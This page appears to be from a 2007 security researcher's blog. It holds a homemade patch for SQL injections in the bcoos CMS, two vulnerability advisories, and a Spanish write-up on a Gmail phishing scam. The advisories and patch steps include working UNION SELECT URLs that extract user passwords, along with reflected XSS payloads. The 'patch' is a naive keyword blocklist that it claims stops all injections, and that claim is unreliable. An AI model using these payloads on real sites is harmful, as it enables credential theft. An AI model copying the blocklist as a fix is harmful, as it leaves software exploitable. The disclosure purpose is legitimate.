Posible patch for SQL Injections In bcoos 1.0.10

Sunday, December 02, 2007
############################################
Posible patch for SQL Injections In bcoos 1.0.10
vendor url:http://www.bccos.net
Patch by Lostmon. (lostmon@gmail.com)
Original article:http://lostmon.blogspot.com
/2007/12/posible-patch-for-sql-injections-in.html
############################################

in the last week some researchers and me have found multiple
critical SQL injections in bcoos 1.0.10 and prior versions.

After a simple study/look of the source code of product
i have found a simple patch , this is not a oficial patch but it
still working fine ,before the vendor release a oficial patch or
a new release.

You can use this modification as a solution to mitigate all
SQL injections , only need to detect 'union' sql command.


##########################
Sample code
##########################
you need to add this code to all afected files ...


if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}

###########################
patch mylinks/ratelink.php
############################

open ratelink.php and arround line 73 you have a 'else' like } else {

put the code just before the else condition like :

}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

save and close the file and now it´s pached
try to exploit for verify :

http://localhost/bcoops/modules/mylinks/ratelink.php?lid=
-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

###############################
patch adresses/ratefile.php
##############################

open ratefile.php and arround line 70 you have a else like } else {

put the code just before the else condition like :

}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

save and close the file and now it´s pached
try to exploit for verify :

http://localhost/bcoops/modules/adresses/ratefile.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

###############################
patch mysections/ratefile.php
##############################

open ratefile.php and arround line 77 you have a else like } else {

put the code just before the else condition like :

}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

save and close the file and now it´s pached
try to exploit for verify :

http://localhost/bcoops/modules/mysections/ratefile.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

############################
patch banners/click.php
############################

open click.php and arround line 5 you have $bid = $_GET['bid'];

put the code just after the this line :

if (eregi("%20union%20", $bid) ||eregi(" union ", $bid) || eregi("\*union\*", $bid) || eregi("\+union\+", $bid) || eregi("\*", $bid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}

save and close the file and now it´s pached
try to exploit for verify :

http://localhost/bcoops/modules/banners/click.php?
bid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

###########################
patch arcade/index.php
############################


open index.php and arround line 15 you have a switch($act)


put the code just before the switch


if (eregi("%20union%20", $gid) ||eregi(" union ", $gid) ||
eregi("\*union\*", $gid) || eregi("\+union\+", $gid) || eregi("\*",
$gid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}

you can patch all of the rate files with the same code, because
for rating the code and funcions are similars in diferent modules.

###################-€nd-#######################

thnx to estrella to be my ligth.
thnx to all Lostmon Group Team !!
Thnx To All OSVDB manglers !!! Waiting for OSVDB 2.0 !!!
Thnx To orinico i know how can i do :D

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Bcoops adresses/ratefile.php lid variable SQL injection

Friday, November 30, 2007
########################################################
Bcoops adresses/ratefile.php lid variable SQL injection
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2007/11/
bcoops-adressesratefilephp-lid-variable.html
vendor notify:NO exploits available: YES
########################################################



bcoos is content-community management system written in PHP-MySQL.

bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the script not
properly sanitizing user-supplied input to the 'lid' variable,
and adresses/ratefile.php script.This may allow an attacker to
inject or manipulate SQL queries in the backend database.



#################
Versions:
#################

bcoops 1.0.10 =< vulnerable

#################
Solution:
#################

No solution at this time !!!
Try to edit the source code
or Try another product

#################
Timeline:
#################

Discovered:25-11-2007
vendor notify:--------
vendor response:-------
disclosure:30-11-2007


#################
SQL intections:
#################


http://localhost/bcoops/modules/adresses/ratefile.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201



####################### €nd ##############################



Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Bcoops SQL injection and Cross-site scripting

Wednesday, November 28, 2007
####################################################
Bcoops SQL injection and Cross-site scripting
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2007/11/
bcoops-sql-injection-and-cross-site.html
vendor notify:YES exploits available: YES
####################################################



bcoos is content-community management system written in PHP-MySQL.

bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the arcade/index.php
script not properly sanitizing user-supplied input to the 'gid'
variable,and myalbum/ratephoto.php script and 'lid' variable are
afected by the same flaw This may allow an attacker to inject or
manipulate SQL queries in the backend database.



bccops contains too a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate the
'day' and 'year' variable upon submission to modules/theecal/display.php
script. This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to
a loss of integrity


#################
Versions:
#################

bcoops 1.0.10 =< vulnerable

#################
Solution:
#################

No solution at this time !!!

#################
Timeline:
#################

Discovered:25-11-2007
vendor notify:27-11-2007
vendor response:-------
disclosure:28-11-2007


#################
SQL intections:
#################

http://localhost/modules/arcade/index.php?act=show_stats
&gid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

http://localhost/modules/myalbum/ratephoto.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

http://localhost/modules/mylinks/ratelink.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201


#####################
Cross-site Scripting
#####################


http://localhost/modules/ecal/display.php?
day=17&month=11&year=2007"><script>alert()</script>


http://localhost/modules/ecal/display.php?
day=1"><script>alert()</script>&month=11&year=2007



####################### €nd ############################



Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Robo de contraseñas mediante un Scam de Google Gmail

Thursday, October 04, 2007
#####################################################
Robo de contraseñas mediante un Scam de Google Gmail
Robo de contraseñas mediante phishing en E-bullion
Descubridores e investigadores: Lostmon(1) Imydes(2)
Articulo original: http://www.imydes.com/?p=117
Fecha: 03/10/2007
####################################################

Este articulo procede de un trabajo conjunto con
Imydes la direccion del Articulo original: http://www.imydes.com/?p=117

--
Como seguramente todos sabreis, Google tiene bastantes
servicios a sus espaldas, por citar algunos:
Google Adsense, Google Docs, Gmail, Blogger, Picassa…

Mediante este Scam de Gmail Accounts cuyo objetivo es
robar la contraseña del internauta despistado podría
dar acceso a todos estos servicios de oogle mencionados.

El Scam en cuestión consiste en simular un formulario
de Google cuyo título es “My Account” simulando ser un
gestor para editar información personal de la cuenta de
Google.

En el formulario en cuestión encontramos los siguientes campos:

Username
Password
First name
Last name
Nick name
Zip code
Country

(Una pequeña nota, el usuario intermedio si pica por primera
vez podrá ver un pequeño fallo y es que el campo Password no
está protegido por **** y sale la contraseña a simple vista
y en el campo Country sale un desplegable con varios paises
y al no estar codificado con UTF-8 salen con “carácteres extraños”)

Gmail Accounts Scam Imydes

Si llenamos los campos antes nombrados y le damos a “Save”,
veremos que nos direcciona hacia “update.php” donde seguramente
se almacene la información introducida en el formulario desconozco
si es en BBDD o en un fichero).

Por otra parte, si entramos en la web directamente sin poner
www veremos que los creadores del Scam se han olvidado de
poner una página inicial para que no puedas ver el contenido
del servidor raiz.

En este descuido podemos ver un sistema para enviar e-mails
masivos del Scam (concretamente la dirección web es esta: http://us-gmail.com/mail.php).

También podemos ver una página web que seguramente sigue la
misma dinámica que el Scam de Gmail pero es con e-Bullion
(web http://us-gmail.com/e-lbullion/). Podemos ver que en
el caso de e-bullion se dirige a “/secure/update.php”.

E-bullion Phishing

Créditos:

Imydes (Documentación del Scam e investigación)(www.imydes.com)
Lostmon (El descubridor de este Scam e investigación) (http://lostmon.blogspot.com)
Lostmon Group (http://groups.google.com/group/lostmon)

Gracias a XiuX, MARNI, itimad, Yeremat, Soed, Newcastle por confiar en mi.
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends